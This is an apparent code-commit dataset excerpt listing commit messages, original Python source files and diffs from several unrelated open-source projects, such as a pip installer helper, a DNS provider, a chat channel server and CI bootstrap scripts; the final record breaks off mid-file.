commit
stringlengths 40
40
| subject
stringlengths 1
3.25k
| old_file
stringlengths 4
311
| new_file
stringlengths 4
311
| old_contents
stringlengths 0
26.3k
| lang
stringclasses 3
values | proba
float64 0
1
| diff
stringlengths 0
7.82k
|
|---|---|---|---|---|---|---|---|
8e35a5f5e7da38105961178478c33e92c81caf62
|
Use new homely._ui.system() instead of subprocess
|
homely/pipinstall.py
|
homely/pipinstall.py
|
from subprocess import check_output, check_call
from homely._engine2 import Helper, Cleaner, getengine
from homely._utils import haveexecutable
from homely._ui import isinteractive
def pipinstall(packagename, which, user=True):
engine = getengine()
for version in which:
assert version in (2, 3)
helper = PIPInstall(packagename, version, user)
engine.run(helper)
_known_pips = set()
def _haspkg(pipcmd, name):
output = check_output([pipcmd, 'list', '--disable-pip-version-check'])
find = '%s ' % name
for line in output.decode('utf-8').split("\n"):
if line.startswith(find):
return True
return False
class PIPInstall(Helper):
_name = None
_version = None
_user = False
def __init__(self, name, version, user):
super(PIPInstall, self).__init__()
self._name = name
self._version = version
self._user = user
self._pipcmd = {2: "pip2", 3: "pip3"}[version]
if self._pipcmd not in _known_pips:
if not haveexecutable(self._pipcmd):
# FIXME: what type of helpful error should we be raising here?
raise Exception("%s executable not found" % self._pipcmd)
_known_pips.add(self._pipcmd)
def getcleaner(self):
return PIPCleaner(self._name, self._pipcmd)
def pathsownable(self):
return {}
def getclaims(self):
yield "%s:%s" % (self._pipcmd, self._name)
def isdone(self):
return _haspkg(self._pipcmd, self._name)
@property
def description(self):
user = ' --user' if self._user else ''
return "%s install %s%s" % (self._pipcmd, self._name, user)
def makechanges(self):
cmd = [
self._pipcmd,
'install',
self._name,
'--disable-pip-version-check',
]
if self._user:
cmd.append('--user')
check_call(cmd)
factname = 'pipinstall:%s:%s' % (self._pipcmd, self._name)
self._setfact(factname, True)
def affectspath(self, path):
return False
class PIPCleaner(Cleaner):
def __init__(self, name, pipcmd):
super(PIPCleaner, self).__init__()
self._name = name
assert pipcmd in ('pip2', 'pip3')
self._pipcmd = pipcmd
def asdict(self):
return dict(name=self._name, pipcmd=self._pipcmd)
@classmethod
def fromdict(class_, data):
return class_(data["name"], data["pipcmd"])
def __eq__(self, other):
return self._name == other._name and self._pipcmd == other._pipcmd
def isneeded(self):
factname = 'pipinstall:%s:%s' % (self._pipcmd, self._name)
hasfact = self._getfact(factname, False)
return hasfact and _haspkg(self._pipcmd, self._name)
@property
def description(self):
return "%s uninstall %s" % (self._pipcmd, self._name)
def makechanges(self):
cmd = [
self._pipcmd,
'uninstall',
self._name,
'--disable-pip-version-check',
]
if not isinteractive():
cmd.append('--yes')
factname = 'pipinstall:%s:%s' % (self._pipcmd, self._name)
try:
check_call(cmd)
finally:
self._clearfact(factname)
return []
def needsclaims(self):
yield "%s:%s" % (self._pipcmd, self._name)
def wantspath(self, path):
return False
|
Python
| 0.000001
|
@@ -1,53 +1,4 @@
-from subprocess import check_output, check_call%0A%0A
from
@@ -125,16 +125,24 @@
eractive
+, system
%0A%0A%0Adef p
@@ -418,20 +418,14 @@
t =
-check_output
+system
(%5Bpi
@@ -468,17 +468,53 @@
-check'%5D
-)
+,%0A stdout=True)%5B1%5D
%0A fin
@@ -1919,34 +1919,30 @@
r')%0A
-check_call
+system
(cmd)%0A
@@ -3229,18 +3229,14 @@
-check_call
+system
(cmd
|
52eebb215f52ae73a881e3d4e9a695139c260d3b
|
Empty names should be called @
|
lexicon/providers/transip.py
|
lexicon/providers/transip.py
|
from __future__ import absolute_import
from .base import Provider as BaseProvider
from transip.client import DomainClient
def ProviderParser(subparser):
subparser.add_argument("--auth-username", help="specify username used to authenticate")
subparser.add_argument("--auth-api-key", help="specify API private key to authenticate")
subparser.add_argument("--auth-ca-bundle", help="specify CA bundle to use to verify API SSL certificate")
class Provider(BaseProvider):
def __init__(self, options):
super(Provider, self).__init__(options)
self.provider_name = 'transip'
self.domain_id = None
username = self.options.get('auth_username')
key_file = self.options.get('auth_api_key')
if not username or not key_file:
raise StandardError("No username and/or keyfile was specified")
self.client = DomainClient(
username=username,
key_file=key_file,
mode="readonly",
cacert=self.options.get('auth_ca_bundle', False)
)
# Authenticate against provider,
# Make any requests required to get the domain's id for this provider, so it can be used in subsequent calls.
# Should throw an error if authentication fails for any reason, of if the domain does not exist.
def authenticate(self):
## This request will fail when the domain does not exist,
## allowing us to check for existence
self.client.getInfo(self.options.get('domain'))
# Create record. If record already exists with the same content, do nothing'
def create_record(self, type, name, content):
raise NotImplementedError("Providers should implement this!")
# List all records. Return an empty list if no records found
# type, name and content are used to filter records.
# If possible filter during the query, otherwise filter after response is received.
def list_records(self, type=None, name=None, content=None):
records = self._filter_records(
records=self.client.getInfo(self.options.get('domain')).dnsEntries,
type=type,
name=name,
content=content
)
print 'list_records: {0}'.format(records)
return records
# Update a record. Identifier must be specified.
def update_record(self, identifier, type=None, name=None, content=None):
raise NotImplementedError("Providers should implement this!")
# Delete an existing record.
# If record does not exist, do nothing.
# If an identifier is specified, use it, otherwise do a lookup using type, name and content.
def delete_record(self, identifier=None, type=None, name=None, content=None):
raise NotImplementedError("Providers should implement this!")
def _filter_records(self, records, type=None, name=None, content=None):
_records = []
for record in records:
if (not type or record.type == type) and \
(not name or record.name == self._relative_name(name)) and \
(not content or record.content == content):
_records.append({
"name": record.name,
"type": record.type,
"content": record.content,
"ttl": record.expire
})
return _records
|
Python
| 0.998725
|
@@ -2776,24 +2776,197 @@
nt this!%22)%0A%0A
+ def _relative_name(self, record_name):%0A name = super(Provider, self)._relative_name(record_name)%0A if not name:%0A name = %22@%22%0A return name%0A%0A
def _fil
|
c3f872f306a0ff516e4dae227e6f963cb3841bf2
|
save excluded users in presence payload
|
channelstream/channel.py
|
channelstream/channel.py
|
import copy
import logging
import six
import uuid
from datetime import datetime
from channelstream import server_state
from channelstream.utils import process_catchup
log = logging.getLogger(__name__)
class Channel(object):
""" Represents one of our chat channels - has some config options """
config_keys = [
"notify_presence",
"store_history",
"history_size",
"broadcast_presence_with_user_lists",
"notify_state",
"store_frames",
]
def __init__(self, name, long_name=None, channel_config=None):
"""
:param name:
:param long_name:
:param channel_config:
"""
self.uuid = uuid.uuid4()
self.name = name
self.long_name = long_name
self.last_active = None
self.connections = {}
self.notify_presence = False
self.broadcast_presence_with_user_lists = False
# channel sends all user state key changes
self.notify_state = False
self.salvageable = False
self.store_history = False
self.store_frames = True
self.history_size = 10
self.history = []
# store frames for fetching when connection is established
self.frames = []
if channel_config:
self.reconfigure_from_dict(channel_config)
log.info("%s created" % self)
log.info("Configuration used: {}".format(channel_config))
self.mark_activity()
def mark_activity(self):
self.last_active = datetime.utcnow()
def get_catchup_frames(self, newer_than, username):
found = []
for t, f in self.frames:
# either old frame or user is excluded or PM not meant for user
if (
t < newer_than
or (f["exclude_users"] and username in f["exclude_users"])
or (f["pm_users"] and username not in f["pm_users"])
):
continue
found.append(process_catchup(f))
return found
def reconfigure_from_dict(self, config):
if config:
for key in self.config_keys:
val = config.get(key)
if val is not None:
setattr(self, key, val)
def add_connection(self, connection):
username = connection.username
connections = self.connections.setdefault(username, [])
if not connections and self.notify_presence:
self.send_notify_presence_info(username, "joined")
if connection not in connections:
connections.append(connection)
return True
return False
def remove_connection(self, connection):
was_found = False
username = connection.username
connections = self.connections.setdefault(username, [])
if connection in connections:
self.connections[username].remove(connection)
was_found = True
self.after_parted(username)
return was_found
def after_parted(self, username):
"""
Sends parted message if necessary and removed username from
connections if empty
:param username:
:return:
"""
if not self.connections[username]:
del self.connections[username]
if self.notify_presence:
self.send_notify_presence_info(username, "parted")
def send_notify_presence_info(self, username, action):
"""
Sends a message to other connected parties about a presence change
:param username:
:param action:
:return:
"""
connected_users = []
if self.broadcast_presence_with_user_lists:
for _username in self.connections.keys():
user_inst = server_state.USERS.get(_username)
user_data = {
"user": user_inst.username,
"state": user_inst.public_state,
}
connected_users.append(user_data)
self.mark_activity()
payload = {
"uuid": uuid.uuid4(),
"type": "presence",
"no_history": False,
"pm_users": [],
"exclude_users": [],
"user": username,
"users": connected_users,
"timestamp": self.last_active,
"channel": self.name,
"message": {"action": action},
"state": None,
"catchup": False,
}
if action == "joined":
payload["state"] = server_state.USERS[username].public_state
self.add_message(payload, exclude_users=[username])
return payload
def send_user_state(self, user_inst, changed):
self.mark_activity()
public_changed = [x for x in changed if x["key"] in user_inst.public_state]
payload = {
"uuid": uuid.uuid4(),
"type": "user_state_change",
"no_history": False,
"pm_users": [],
"exclude_users": [],
"user": user_inst.username,
"timestamp": self.last_active,
"catchup": False,
"channel": self.name,
"message": {"state": user_inst.public_state, "changed": public_changed},
}
self.add_message(payload)
return payload
def add_frame(self, frame):
if self.store_frames:
self.frames.append((datetime.utcnow(), frame))
self.frames = self.frames[-100:]
def add_to_history(self, message):
if self.store_history and message["type"] == "message":
self.history.append(message)
self.history = self.history[self.history_size * -1 :]
def add_message(self, message, pm_users=None, exclude_users=None):
"""
Sends the message to all connections subscribed to this channel
"""
pm_users = pm_users or []
exclude_users = exclude_users or []
self.mark_activity()
if not message['no_history']:
self.add_to_history(message)
self.add_frame(message)
message = copy.deepcopy(message)
# do not leak delivery info
del message['no_history']
del message['pm_users']
del message['exclude_users']
total_sent = 0
# message everyone subscribed except excluded
for user, conns in six.iteritems(self.connections):
if not exclude_users or user not in exclude_users:
for connection in conns:
if not pm_users or connection.username in pm_users:
connection.add_message(message)
total_sent += 1
return total_sent
def __repr__(self):
return "<Channel: %s, connections:%s>" % (self.name, len(self.connections))
def get_info(self, include_history=True, include_users=False):
settings = {k: getattr(self, k) for k in self.config_keys}
chan_info = {
"uuid": self.uuid,
"name": self.name,
"long_name": self.long_name,
"settings": settings,
"history": self.history if include_history else [],
"last_active": self.last_active,
"total_connections": sum(
[len(conns) for conns in self.connections.values()]
),
"total_users": 0,
"users": [],
}
for username in self.connections.keys():
user_inst = server_state.USERS.get(username)
if include_users and user_inst.username not in chan_info["users"]:
chan_info["users"].append(user_inst.username)
chan_info["users"] = sorted(chan_info["users"])
chan_info["total_users"] = len(chan_info["users"])
return chan_info
def __json__(self, request=None):
return self.get_info()
|
Python
| 0.000001
|
@@ -1954,16 +1954,17 @@
ontinue%0A
+%0A
@@ -4211,32 +4211,40 @@
xclude_users%22: %5B
+username
%5D,%0A %22
@@ -4637,25 +4637,39 @@
e_users=
-%5Busername
+payload%5B%22exclude_users%22
%5D)%0A
|
c0da9801f726ab3ac5c360f77598f1d14c615c2e
|
make sure windrose_utils._make_plot gets exercised!
|
pyiem/tests/test_windrose_utils.py
|
pyiem/tests/test_windrose_utils.py
|
import unittest
import datetime
import psycopg2
from pyiem.windrose_utils import windrose, _get_timeinfo
class Test(unittest.TestCase):
def test_timeinfo(self):
"""Exercise the _get_timeinfo method"""
res = _get_timeinfo(range(1, 10), 'hour', 24)
self.assertEquals(res['labeltext'], '(1, 2, 3, 4, 5, 6, 7, 8, 9)')
res = _get_timeinfo([1], 'month', 1)
self.assertEquals(res['sqltext'],
' and extract(month from valid) = 1 ')
def test_windrose(self):
"""Exercise the windrose code"""
pgconn = psycopg2.connect(database='asos', host="iemdb")
cursor = pgconn.cursor()
v = datetime.datetime(2015, 1, 1, 6)
for s in range(100):
v += datetime.timedelta(hours=1)
cursor.execute("""INSERT into t2015(station, valid, sknt, drct)
VALUES (%s, %s, %s, %s)""", ('AMW2', v, s, s))
# plot.windrose('AMW2', fp='/tmp/test_plot_windrose.png',
# cursor=cursor)
fig = windrose('AMW2',
cursor=cursor, justdata=True)
self.assertTrue(fig is not None)
fig = windrose('AMW2',
cursor=cursor, sts=datetime.datetime(2001, 1, 1),
ets=datetime.datetime(2001, 1, 2))
self.assertTrue(fig is not None)
res = windrose('AMW2',
cursor=cursor, sts=datetime.datetime(2015, 1, 1),
ets=datetime.datetime(2015, 10, 2), justdata=True)
assert isinstance(res, str)
|
Python
| 0
|
@@ -925,157 +925,30 @@
-# plot.windrose('AMW2', fp='/tmp/test_plot_windrose.png',%0A # cursor=cursor)%0A fig = windrose('AMW2',%0A
+fig = windrose('AMW2',
cur
@@ -959,29 +959,28 @@
cursor,
-justdata=True
+sname='Ames'
)%0A
@@ -1169,17 +1169,70 @@
e(20
-0
1
+6
, 1,
-2)
+1))%0A # fig.savefig('/tmp/test_plot_windrose.png'
)%0A
|
d32d57fc07b595c4dc0a24a04ac4589ad5d16918
|
Make modules uninstallable
|
hotel/__openerp__.py
|
hotel/__openerp__.py
|
# -*- encoding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2009 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
{
"name" : "Hotel Management Base",
"version" : "1.0",
"author" : "Tiny,Odoo Community Association (OCA)",
"category" : "Generic Modules/Hotel Management",
"description": """
Module for Hotel/Resort/Rooms/Property management. You can manage:
* Configure Property
* Hotel Configuration
* Check In, Check out
* Manage Folio
* Payment
Different reports are also provided, mainly for hotel statistics.
""",
"depends" : ["sale"],
"init_xml" : [],
"demo_xml" : [
],
"update_xml" : [
"hotel_view.xml",
"hotel_data.xml",
"hotel_folio_workflow.xml",
"report/hotel_report.xml",
"wizard/hotel_wizard.xml",
"security/hotel_security.xml",
"security/ir.model.access.csv",
],
"active": False,
'installable': False,
'application': True,
}
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
Python
| 0
| |
eca18d440d37e3caebe049617910420e6d37d507
|
remove execute bit from compare_ir python script
|
src/compiler/glsl/tests/compare_ir.py
|
src/compiler/glsl/tests/compare_ir.py
|
#!/usr/bin/env python
# coding=utf-8
#
# Copyright © 2011 Intel Corporation
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice (including the next
# paragraph) shall be included in all copies or substantial portions of the
# Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
# DEALINGS IN THE SOFTWARE.
# Compare two files containing IR code. Ignore formatting differences
# and declaration order.
import os
import os.path
import subprocess
import sys
import tempfile
from sexps import *
if len(sys.argv) != 3:
print 'Usage: python2 ./compare_ir.py <file1> <file2>'
exit(1)
with open(sys.argv[1]) as f:
ir1 = sort_decls(parse_sexp(f.read()))
with open(sys.argv[2]) as f:
ir2 = sort_decls(parse_sexp(f.read()))
if ir1 == ir2:
exit(0)
else:
file1, path1 = tempfile.mkstemp(os.path.basename(sys.argv[1]))
file2, path2 = tempfile.mkstemp(os.path.basename(sys.argv[2]))
try:
os.write(file1, '{0}\n'.format(sexp_to_string(ir1)))
os.close(file1)
os.write(file2, '{0}\n'.format(sexp_to_string(ir2)))
os.close(file2)
subprocess.call(['diff', '-u', path1, path2])
finally:
os.remove(path1)
os.remove(path2)
exit(1)
|
Python
| 0
| |
39d89982a2a2bba810e51614158bf474cba500dc
|
Add more ComputerPlayer names
|
computer_player.py
|
computer_player.py
|
import random
import sys
import time
from player import Player
from solving_algorithm import generate_solutions
class ComputerPlayer(Player):
def __init__(self):
super(ComputerPlayer, self).__init__()
self.PAUSE = 0.1
self.names = ['Chell', 'GLaDOS', 'Companion Cube', 'Curiosity Core', 'Wheatley', 'Caroline']
self.solutions = []
def __type(self, message):
sys.stdout.write(' ')
sys.stdout.flush()
time.sleep(self.PAUSE * 5)
for character in message:
sys.stdout.write(character)
sys.stdout.flush()
time.sleep(self.PAUSE)
time.sleep(self.PAUSE * 5)
print
def remember_rules(self, pattern_length, pattern_colours):
self.pattern_length = pattern_length
self.pattern_colours = pattern_colours
def get_ready(self):
self.colours = []
self.colours_tried = 0
self.solving_phase = 1
def ask_for_name(self, message=''):
self.name = random.choice(self.names)
if message:
print message.rstrip(),
self.__type(self.name)
def choose_secret_pattern(self, message=''):
self.secret_pattern = []
for colour in range(self.pattern_length):
self.secret_pattern.append(random.choice(self.pattern_colours))
if message:
print message.rstrip(),
self.__type("?" * self.pattern_length)
def make_guess(self, message=''):
self.guess = []
if self.solving_phase == 1:
colour = list(self.pattern_colours).pop(self.colours_tried)
for peg in range(self.pattern_length):
self.guess.append(colour)
elif self.solving_phase == 2:
for colour in self.solutions:
self.guess.append(colour)
elif self.solving_phase == 3:
solution = self.solutions.pop()
for colour in solution:
self.guess.append(colour)
if message:
print message.rstrip(),
self.__type(''.join(self.guess))
def analyse_feedback(self, feedback):
if self.solving_phase == 1:
colour = self.guess[0]
for key in feedback:
self.colours.append(colour)
self.colours_tried += 1
if self.colours_tried == len(self.pattern_colours) - 1:
colour = list(self.pattern_colours).pop(self.colours_tried)
for colour in range(self.pattern_length - len(self.colours)):
self.colours.append(colour)
self.colours_tried += 1
if len(self.colours) == self.pattern_length:
self.solutions = self.colours
self.solving_phase = 2
elif self.solving_phase == 2:
self.solutions = generate_solutions(self.guess, feedback)
self.solving_phase = 3
elif self.solving_phase == 3:
new_solutions = generate_solutions(self.guess, feedback)
solutions = []
for solution in self.solutions:
if solution in new_solutions:
solutions.append(solution)
self.solutions = solutions
|
Python
| 0
|
@@ -281,62 +281,96 @@
, 'C
-ompanion Cub
+uriosity Cor
e', '
-Curiosity Core', 'Wheatley', 'Carolin
+Turret', 'Companion Cube', 'Wheatley', 'Cave Johnson', 'Caroline', 'Cak
e'%5D%0A
|
8f8dbfef262021b377974f5fa8fecd6c89cebed4
|
Install missing deps.
|
ci/appveyor-bootstrap.py
|
ci/appveyor-bootstrap.py
|
"""
AppVeyor will at least have few Pythons around so there's no point of implementing a bootstrapper in PowerShell.
This is a port of https://github.com/pypa/python-packaging-user-guide/blob/master/source/code/install.ps1
with various fixes and improvements that just weren't feasible to implement in PowerShell.
"""
from __future__ import print_function
from os import environ
from os.path import exists
from subprocess import check_call
try:
from urllib.request import urlretrieve
except ImportError:
from urllib import urlretrieve
BASE_URL = "https://www.python.org/ftp/python/"
GET_PIP_URL = "https://bootstrap.pypa.io/get-pip.py"
GET_PIP_PATH = "C:\get-pip.py"
URLS = {
("2.7", "64"): BASE_URL + "2.7.13/python-2.7.13.amd64.msi",
("2.7", "32"): BASE_URL + "2.7.13/python-2.7.13.msi",
("3.4", "64"): BASE_URL + "3.4.4/python-3.4.4.amd64.msi",
("3.4", "32"): BASE_URL + "3.4.4/python-3.4.4.msi",
("3.5", "64"): BASE_URL + "3.5.4/python-3.5.4-amd64.exe",
("3.5", "32"): BASE_URL + "3.5.4/python-3.5.4.exe",
("3.6", "64"): BASE_URL + "3.6.2/python-3.6.2-amd64.exe",
("3.6", "32"): BASE_URL + "3.6.2/python-3.6.2.exe",
}
INSTALL_CMD = {
# Commands are allowed to fail only if they are not the last command. Eg: uninstall (/x) allowed to fail.
"2.7": [["msiexec.exe", "/L*+!", "install.log", "/qn", "/x", "{path}"],
["msiexec.exe", "/L*+!", "install.log", "/qn", "/i", "{path}", "TARGETDIR={home}"]],
"3.4": [["msiexec.exe", "/L*+!", "install.log", "/qn", "/x", "{path}"],
["msiexec.exe", "/L*+!", "install.log", "/qn", "/i", "{path}", "TARGETDIR={home}"]],
"3.5": [["{path}", "/quiet", "TargetDir={home}"]],
"3.6": [["{path}", "/quiet", "TargetDir={home}"]],
}
def download_file(url, path):
print("Downloading: {} (into {})".format(url, path))
progress = [0, 0]
def report(count, size, total):
progress[0] = count * size
if progress[0] - progress[1] > 1000000:
progress[1] = progress[0]
print("Downloaded {:,}/{:,} ...".format(progress[1], total))
dest, _ = urlretrieve(url, path, reporthook=report)
return dest
def install_python(version, arch, home):
print("Installing Python", version, "for", arch, "bit architecture to", home)
if exists(home):
return
path = download_python(version, arch)
print("Installing", path, "to", home)
success = False
for cmd in INSTALL_CMD[version]:
cmd = [part.format(home=home, path=path) for part in cmd]
print("Running:", " ".join(cmd))
try:
check_call(cmd)
except Exception as exc:
print("Failed command", cmd, "with:", exc)
if exists("install.log"):
with open("install.log") as fh:
print(fh.read())
else:
success = True
if success:
print("Installation complete!")
else:
print("Installation failed")
def download_python(version, arch):
for _ in range(3):
try:
return download_file(URLS[version, arch], "installer.exe")
except Exception as exc:
print("Failed to download:", exc)
print("Retrying ...")
def install_pip(home):
pip_path = home + "/Scripts/pip.exe"
python_path = home + "/python.exe"
if exists(pip_path):
print("pip already installed.")
else:
print("Installing pip...")
download_file(GET_PIP_URL, GET_PIP_PATH)
print("Executing:", python_path, GET_PIP_PATH)
check_call([python_path, GET_PIP_PATH])
def install_packages(home, *packages):
cmd = [home + "/Scripts/pip.exe", "install"]
cmd.extend(packages)
check_call(cmd)
if __name__ == "__main__":
install_python(environ['PYTHON_VERSION'], environ['PYTHON_ARCH'], environ['PYTHON_HOME'])
install_pip(environ['PYTHON_HOME'])
install_packages(environ['PYTHON_HOME'], "setuptools>=18.0.1", "wheel", "tox", "virtualenv>=13.1.0")
|
Python
| 0
|
@@ -3932,64 +3932,26 @@
'%5D,
-%22setuptools%3E=18.0.1%22, %22
+'tox-
wheel
-%22, %22tox%22, %22virtualenv%3E=13.1.0%22
+', 'twine'
)%0A
|
b59c1299dab672f4670e2fdbe7ae4f959deab118
|
Version bump
|
conans/__init__.py
|
conans/__init__.py
|
# Allow conans to import ConanFile from here
# to allow refactors
from conans.client.build.autotools_environment import AutoToolsBuildEnvironment
from conans.client.build.cmake import CMake
from conans.client.build.meson import Meson
from conans.client.build.msbuild import MSBuild
from conans.client.build.visual_environment import VisualStudioBuildEnvironment
from conans.client.run_environment import RunEnvironment
from conans.model.conan_file import ConanFile
from conans.model.options import Options
from conans.model.settings import Settings
from conans.util.files import load
# complex_search: With ORs and not filtering by not restricted settings
COMPLEX_SEARCH_CAPABILITY = "complex_search"
CHECKSUM_DEPLOY = "checksum_deploy" # Only when v2
REVISIONS = "revisions" # Only when enabled in config, not by default look at server_launcher.py
ONLY_V2 = "only_v2" # Remotes and virtuals from Artifactory returns this capability
SERVER_CAPABILITIES = [COMPLEX_SEARCH_CAPABILITY, REVISIONS] # Server is always with revisions
DEFAULT_REVISION_V1 = "0"
__version__ = '1.13.2'
|
Python
| 0.000001
|
@@ -1073,11 +1073,11 @@
= '1.13.
-2
+3
'%0A
|
c2c2c99326938a6c0064b4bdb80c37bd05fbd013
|
fix url namespace
|
corehq/apps/linked_domain/remote_accessors.py
|
corehq/apps/linked_domain/remote_accessors.py
|
from __future__ import absolute_import
import requests
from couchdbkit.exceptions import ResourceNotFound
from django.urls.base import reverse
from requests import ConnectionError
from corehq.apps.app_manager.dbaccessors import wrap_app
from corehq.apps.hqmedia.models import CommCareMultimedia
from corehq.apps.linked_domain.auth import ApiKeyAuth
from corehq.apps.linked_domain.exceptions import RemoteRequestError, RemoteAuthError, ActionNotPermitted
from corehq.util.view_utils import absolute_reverse
from dimagi.utils.logging import notify_exception
def get_toggles_previews(domain_link):
return _do_simple_request('remote:toggles', domain_link)
def get_custom_data_models(domain_link, limit_types=None):
url = reverse('remote:custom_data_models', args=[domain_link.linked_domain])
params = None
if limit_types:
params = [('type', type_) for type_ in limit_types]
_do_request_to_remote_hq(url, domain_link.remote_details, domain_link.linked_domain, params)
return _do_simple_request('remote:custom_data_models', domain_link)
def get_user_roles(domain_link):
return _do_simple_request('remote:user_roles', domain_link)['user_roles']
def get_released_app_version(domain, app_id, remote_details):
url = reverse('current_app_version', args=[domain, app_id])
response = _do_request_to_remote_hq_json(url, remote_details, None)
return response.get('latestReleasedBuild')
def get_released_app(domain, app_id, linked_domain, remote_details):
url = reverse('linked_domain:latest_released_app_source', args=[domain, app_id])
response = _do_request_to_remote_hq_json(url, remote_details, linked_domain)
return _convert_app_from_remote_linking_source(response)
def whilelist_app_on_remote(domain, app_id, linked_domain, remote_details):
url = reverse('patch_linked_app_whitelist', args=[domain, app_id])
params = {
'whitelist_item': absolute_reverse('domain_homepage', args=[linked_domain])
}
_do_request_to_remote_hq(url, remote_details, None, params, method='patch')
def _convert_app_from_remote_linking_source(app_json):
attachments = app_json.pop('_LAZY_ATTACHMENTS', {})
app = wrap_app(app_json)
app._LAZY_ATTACHMENTS = attachments
return app
def pull_missing_multimedia_for_app(app):
missing_media = _get_missing_multimedia(app)
_fetch_remote_media(app.domain, missing_media, app.remote_app_details)
def _get_missing_multimedia(app):
missing = []
for path, media_info in app.multimedia_map.items():
try:
local_media = CommCareMultimedia.get(media_info['multimedia_id'])
except ResourceNotFound:
filename = path.split('/')[-1]
missing.append((filename, media_info))
else:
_check_domain_access(app.domain, local_media)
return missing
def _check_domain_access(domain, media):
if domain not in media.valid_domains:
media.add_domain(domain)
def _fetch_remote_media(local_domain, missing_media, remote_app_details):
for filename, item in missing_media:
media_class = CommCareMultimedia.get_doc_class(item['media_type'])
content = _fetch_remote_media_content(item, remote_app_details)
media_item = media_class.get_by_data(content)
media_item._id = item['multimedia_id']
media_item.attach_data(content, original_filename=filename)
media_item.add_domain(local_domain, owner=True)
def _fetch_remote_media_content(media_item, remote_app_details):
url = reverse('hqmedia_download', args=[media_item['media_type'], media_item['multimedia_id']])
response = _do_request_to_remote_hq(url, remote_app_details, None)
return response.content
def _do_simple_request(url_name, domain_link):
url = reverse(url_name, args=[domain_link.master_domain])
return _do_request_to_remote_hq_json(url, domain_link.remote_details, domain_link.linked_domain)
def _do_request_to_remote_hq_json(relative_url, remote_details, linked_domain, params=None, method='get'):
return _do_request_to_remote_hq(relative_url, remote_details, linked_domain, params, method).json()
def _do_request_to_remote_hq(relative_url, remote_details, linked_domain, params=None, method='get'):
"""
:param relative_url: Relative URL on remote HQ
:param remote_details: RemoteDetails object containing remote URL base and auth details
:param linked_domain: Used for permission check on remote system
:param params: GET/POST params to include
:param method:
:return:
"""
url_base = remote_details.url_base
username = remote_details.username
api_key = remote_details.api_key
full_url = u'%s%s' % (url_base, relative_url)
headers = {
'HQ-REMOTE-REQUESTER': absolute_reverse('domain_homepage', args=[linked_domain])
}
try:
response = requests.request(
method, full_url,
params=params, auth=ApiKeyAuth(username, api_key), headers=headers
)
except ConnectionError:
notify_exception(None, "Error performing remote app request", details={
'remote_url': full_url,
'params': params,
'headers': headers
})
raise RemoteRequestError(response.status_code)
if response.status_code == 401:
raise RemoteAuthError(response.status_code)
elif response.status_code == 403:
raise ActionNotPermitted(response.status_code)
elif response.status_code != 200:
notify_exception(None, "Error performing remote app request", details={
'remote_url': full_url,
'response_code': response.status_code,
'params': params
})
raise RemoteRequestError(response.status_code)
return response
|
Python
| 0.999895
|
@@ -622,22 +622,29 @@
equest('
-remote
+linked_domain
:toggles
@@ -739,22 +739,29 @@
everse('
-remote
+linked_domain
:custom_
@@ -1034,22 +1034,29 @@
equest('
-remote
+linked_domain
:custom_
@@ -1148,22 +1148,29 @@
equest('
-remote
+linked_domain
:user_ro
|
068e12ebb0fc36fc3bfa397a58c54aa92e361f9a
|
Clean up unit test in test_notifier
|
st2actions/tests/unit/test_notifier.py
|
st2actions/tests/unit/test_notifier.py
|
# Licensed to the StackStorm, Inc ('StackStorm') under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import datetime
import unittest2
import st2tests.config as tests_config
tests_config.parse_args()
from st2actions.notifier import Notifier
from st2common.constants.triggers import INTERNAL_TRIGGER_TYPES
from st2common.models.db.action import LiveActionDB, NotificationSchema
from st2common.models.db.action import NotificationSubSchema
from st2common.models.system.common import ResourceReference
ACTION_TRIGGER_TYPE = INTERNAL_TRIGGER_TYPES['action'][0]
NOTIFY_TRIGGER_TYPE = INTERNAL_TRIGGER_TYPES['action'][1]
class NotifierTestCase(unittest2.TestCase):
class MockDispatcher(object):
def __init__(self, tester):
self.tester = tester
self.notify_trigger = ResourceReference.to_string_reference(
pack=NOTIFY_TRIGGER_TYPE['pack'],
name=NOTIFY_TRIGGER_TYPE['name'])
self.action_trigger = ResourceReference.to_string_reference(
pack=ACTION_TRIGGER_TYPE['pack'],
name=ACTION_TRIGGER_TYPE['name'])
def dispatch(self, *args, **kwargs):
try:
self.tester.assertEqual(len(args), 1)
self.tester.assertTrue('payload' in kwargs)
payload = kwargs['payload']
if args[0] == self.notify_trigger:
self.tester.assertEqual(payload['status'], 'succeeded')
self.tester.assertTrue('execution_id' in payload)
self.tester.assertTrue('start_timestamp' in payload)
self.tester.assertTrue('end_timestamp' in payload)
self.tester.assertEqual('core.local', payload['action_ref'])
